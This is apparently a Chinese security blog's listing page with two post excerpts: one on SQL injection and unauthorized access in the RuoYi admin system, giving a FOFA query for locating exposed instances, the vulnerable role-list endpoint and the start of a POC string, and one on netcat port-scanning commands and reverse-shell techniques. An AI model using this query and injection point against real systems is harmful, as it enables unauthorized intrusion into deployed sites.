2021年8月31日
若依后台管理系统sql注入和未授权访问
摘要: 做测试遇到的若依系统,记录下 FOFA: app="若依-管理系统" 漏洞一:sql注入: 漏洞位置在"系统管理"里中的"角色管理中"http://xxxxxxx/system/role/list POC: pageSize=&pageNum=&orderByColumn=&isAsc=&roleN 阅读全文
posted @ 2021-08-31 11:01 我有清茶与酒 阅读(4789) 评论(0) 推荐(1) 编辑
nc的几种常用操作以及常见的反弹shell的姿势
摘要: 端口扫描: nc -v ip port 指定端口nc -v -w ip -z 1-65536 指定端口范围nc -nvz 127.0.0.1 1-100 nc 使用全链接方式扫描端口(TCP扫描)nc -nvzu 192.168.1.105 1-1024 udp扫描 -v 输出详细报告 -w tim 阅读全文
posted @ 2021-08-31 10:45 我有清茶与酒 阅读(1591) 评论(0) 推荐(0) 编辑